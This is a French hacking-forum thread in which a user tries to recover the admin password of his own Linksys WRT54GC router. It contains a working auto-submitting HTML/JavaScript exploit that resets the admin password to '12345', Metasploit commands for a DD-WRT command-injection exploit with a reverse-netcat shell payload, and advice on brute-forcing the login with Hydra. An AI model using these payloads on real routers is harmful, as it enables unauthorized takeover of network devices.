LE FORUM DU SITE
Wifi, Backtrack, crack WEP et WPA...
Vous n'êtes pas identifié(e).
Bonjours a tous!
Ceci est ma première discussion et j'espère qu'elle sera utile
Alors voila: Je possède un routeur wifi linksys WRT54GC et la page de configuration (http://192.168.1.1/) de ce dernier est protégé par un nom d'utilisateur et un mot de pass.
j'ai fais quelque recherche pour savoir si il était possible de cracker ou de passer ce MDP.
Et voila sur quoi je suis tombé: Comment décrypter un mot de passe Cisco de type 7.
Il y a même un script php et diverses commandes ici: scritp cisco type 7
Ma question est la suivante: Où faut-il entré les commandes du style "show running-config"?? Quel logiciel doit-je utiliser?
D'avance merci pour vos réponses
[source:] www.lepost.fr Edit Noireaude.
A bientôt.
Hors Ligne
Plop merci pour l'info, je me suis permis d'éditer ton lien, tout étéait bon à un détail, il est toujours sympa de citer "explicitement" la source.
Sauf bien sûr si s'est ton site perso.
L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883
Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988 @lavachelibre
Hors Ligne
c'est juste noireaude... merci d'avoir apporté les modifications nécessaire
a l'avenir, je n'y manquerai pas!
Hors Ligne
Salut Ramses (comme le pharaon, oui mais lequel ?), bienvenue sur le forum
Je ne suis pas sûr, mais à mon avis lesdites commandes doivent être tapées dans une session-console sur le routeur même, probablement via telnet. Tu dois donc entrer la commande "[c]telnet 192.168.1.1[/c]" dans un terminal Linux ou une invite de commande Windows (Démarrer > exécuter > cmd).
Le truc, c'est ue pour ouvrir une session en telnet il faut justement connaître le mot de passe d'accès, donc dans ton cas ça ne va sans doute pas t'avancer
A mon sens, la meilleure façon de récupérer ce genre de mot de passe c'est par la force brute mais il faut un bon dico. Après, il suffit d'utiliser Hydra pour tester toutes les combinaisons possibles et l'avantage c'est que là tu auras directement le mot de passe en clair sans devoir inverser le protocole de hachage de Cisco
Hors Ligne
Essaye d'avoir un accès par ssh, et tapes ces commandes.
(mais pour ca il te faut un accès, et dnoc il faut que tu te sois logué, avec un mot de passe. Sysiphe que tu nous tiens )
le cryptage du mot de passe Cisco de type 7, c'est un vieux César !!!! XD MDR XPDTR LOLILOOLOLOLOLOL.
Normal que son nom soit 'WEAK' (=faible en anglais).
ils osent appeler ca un hash ^^
Hors Ligne
Au cas ou tu es sur Windows, il faut savoir que telnet est désactivé par défaut, pour cela tu te rends dans :
Panneau de configuration > Programmes et fonctionnalités > Activer ou désactiver des fonctionnalités Windows ( dans le volet à gauche) et tu coches la case "client telnet"
Tu as tout ce qu'il faut sur les routeurs ici et leurs mdp par défaut --> Exploits & Routeurs
Hors Ligne
Mais quels connaissances! vous m'épaterai toujours... :p
Donc si je comprend bien, il est impossible de récupérer le hash sans le mot de passe?
P.S: Pardon pour le retard, un ami est passé me rendre visite.
Hors Ligne
Bonsoir
Tu peux observer la réponse http header avec le plugin de firefox "live http header" quand tu rentres un mot de passe (meme si il est faux c'est pas grave) je connais pas la config des cisco mais c'est possible que ça soit encodé en base64 ou en ntml, si par exemple tu vois quelque chose comme ça "authorisation basic" il y a peut-etre moyen de décrypter le pass.
Hors Ligne
Merci koala je viens d'essayé et voila: "Authorization: Basic OmFkbWlu"
tu sais ce que veux dire le "OmFkbWlu" ?
fuji, c'est normal que ça fait passé plus de 15min que la modification s'effectue?
merci pour vos réponse
Hors Ligne
tu sais ce que veux dire le "OmFkbWlu" ?
A ton avis? relis le post que j'ai ecris la réponse est dedans, pour infos je viens de trouver le mot de passe mais je te laisse chercher un peu, si on peux appeler ça de la recherche car tu as la réponse sous les yeux
Hors Ligne
tu veux dire que c'est le hash?
éclaire ma lanterne stp koala
Hors Ligne
haaan oui ok c'est pcq il est crypter en base64 bien vu :p
le seul problème est que j'ai essayé avec un faux mot de passe :p donc ce n'est pas celui la...
une autre idée koala?
Hors Ligne
Oui, maintenant que tu sais comment c'est crypter tu peux utiliser medusa ou hydra comme la suggérer Antares mais il va falloir que tu précises que c'est du base64, regardes dans la doc du tool que tu veux utiliser
Hors Ligne
tu peux utiliser medusa ou hydra comme la suggérer Antares mais il va falloir que tu précises que c'est du base64
Pas vraiment, l'utilisateur n'est pas sensé connaître le mot de passe haché, donc ce que Hydra (ou Medusa) va tester ce sont des mots de passe en clair. Une fois qu'il en a trouvé un qui est accepté par le routeur il le signalera à l'utilisateur, c'est pour ça que je disais que ça donnait directement accès au password.
Évidemment l'inconvénient c'est que ça oblige à avoir un dictionnaire qui contient le bon mot de passe, ou à en créer un complet mais là ça risque de prendre un bout de temps à bruteforcer
Hors Ligne
Pas vraiment, l'utilisateur n'est pas sensé connaître le mot de passe haché, donc ce que Hydra (ou Medusa) va tester ce sont des mots de passe en clair. Une fois qu'il en a trouvé un qui est accepté par le routeur il le signalera à l'utilisateur, c'est pour ça que je disais que ça donnait directement accès au password.
Corrigé par le master c'est sur que ça risque de lui prendre du temps
Hors Ligne
Ah oui quand même... je pensais pas que ca prendrai cette ampleur XD
Bon, en résumé, seul un brut force et une attaque par dico pourrai faire sauter ce mot de passe?
N'y a-t-il pas une façon de faire bugger le routeur pour le forcer à reset?
Ou encore, un logiciel qui me permettrai d'obtenir le hash de type 7 sans le mot de passe?
J'ai entendu parlé de "hyper-terminal", ça vous dis quelque chose?
Hors Ligne
N'y a-t-il pas une façon de faire bugger le routeur pour le forcer à reset?
Ou encore, un logiciel qui me permettrai d'obtenir le hash de type 7 sans le mot de passe?
Pour ça il faudrait qu'il y ai une faille dans le système du routeur qui le permette. Je n'en connais pas sur ce modèle, tout ce que j'ai trouvé c'est de quoi le faire planter (buffer overflow) ou de quoi changer le mot de passe admin sans connaître le vrai (mais ça ne te permet pas de récupérer le mot de passe actuel).
Plus de détails ici --> Linksys WRT54GC Password Changer
(encore faut-il que ton firmware n'ait pas été mis à jour pour qu'il soit vulnérable)
J'ai entendu parlé de "hyper-terminal", ça vous dis quelque chose?
l'Hyperterminal de Windows est juste une console qui te permet d'ouvrir une liaison série (RS-232), Telnet ou équivalent. Non seulement tu auras besoin du mot de passe pour ouvrir une session en HT, mais en plus il faudra savoir quelles commandes tu dois taper après. Dans le cas présent je ne suis pas sûr que ça t'aide beaucoup
Hors Ligne
Fuji t'a donné le lien d'un topic intéressant dans lequel figure un lien vers le site Routerpwn. On n'y trouve pas d'exploit spécifique au WRT54GC mais il y a pas mal de choses qui concernent le WRT54G qui mériteraient peut etre d'etre testées, on ne sait jamais: Routerpwn Cisco Linksys WRT54G, WAG120N.
Hors Ligne
Tout d'abord, un grand merci a tous de me répondre aussi rapidement et de prendre mon problème au serieux!
j'ai essayé toutes les solution que vous m'avez donner (hélas sans résultat) a l'exception de l'attaque dico et brut force (trop longue),
et du script java donné par antares.
Antares, pourrai tu me dire comment utiliser ce script? il me semble que c'est du HTML et du Java (mais bon tu le sais déjà :p)
Merci encore a tout le monde!
Hors Ligne
Je pense qu'il suffit de copier-coller le code suivant dans un fichier HTML et d'ouvrir ce fichier avec le navigateur :
<html><body>
<form method="POST" action="http://192.168.1.1:8080/administration.cgi" name="senha" ENCTYPE="multipart/form-data">
<INPUT type="hidden" name="sysPasswd" value="12345" maxLength=20 size=21>
<INPUT type="hidden" name="sysConfirmPasswd" value="12345" maxLength=20 size=21>
</form>
<SCRIPT language="JavaScript">
document.senha.submit();
</SCRIPT>
</body></html>
Après ça le mot de passe admin devrait être "12345".
Je n'ai pas pu tester, vu que je n'ai pas de routeur de ce type à disposition. Et puis comme je te l'ai dit, il est possile que le système de ton WRT54GC ait déjà été patché pour éviter cette faille
Hors Ligne
Voila je vien d'essayé antares.
et visiblement mon routeur est patché (erreur de chargement de la page)
Pourtant, dans la barre d'adresse, il y avais le chemin du fichier HTML,
puis c'est devenu ca: http://192.168.1.1:8080/administration.cgi
Mais bon, ça ne veux rien dire je suppose...
Et le mot de passe reste inchangé...
on commence a être a court de solution! :p
Hors Ligne
Le framework metasploit met à disposition un exploit permettant d'exploiter le firmware "DD-WRT" :
use exploit/linux/http/ddwrt_cgibin_exec <-- l'Exploit à utiliser.
set PAYLOAD cmd/unix/reverse_netcat <-- Le payload à envoyer, il y a aussi le "bind_netcat" et "generic"
set RHOST <-- L'adresse cible, donc: 192.168.1.1
set RPORT <-- Le port cible: 80
set LHOST <-- l'adresse de ton ordi.
Description:
This module abuses a metacharacter injection vulnerability in the
HTTP management server of wireless gateways running DD-WRT. This
flaw allows an unauthenticated attacker to execute arbitrary
commands as the root user account.
Comme Antares, j'ai pas de routeur sous la main et aussi qu'il soit déjà été patché contre cette faille
Si tu n'es pas initié à metasploit et au pentest en général, ne te prends pas trop la tète, laisse tomber. Sinon
tu convoques Imhotep qui a déjà réussi un autre exploit: la construction de la pyramide
Hors Ligne
Discussion | Réponses | Vues | Dernier message |
---|---|---|---|
Besoin d'aide pour choisir Routeur et antenne par Fabio90
|
0 | 1476 | 17-01-2018 18:08:35 par Fabio90 |
|
25 | 1536 | 04-10-2017 23:35:05 par sklerder |
WIFI Toujours activer le WPS sur le routeur par twister
|
5 | 1012 | 30-08-2017 19:57:44 par twister |
Récupération de données dans un TGV par phippaubert
|
19 | 4967 | 15-08-2017 10:45:09 par koala |
Configuration AP Cisco par Vincent_vb
|
3 | 1141 | 09-04-2017 21:15:36 par Vincent_vb |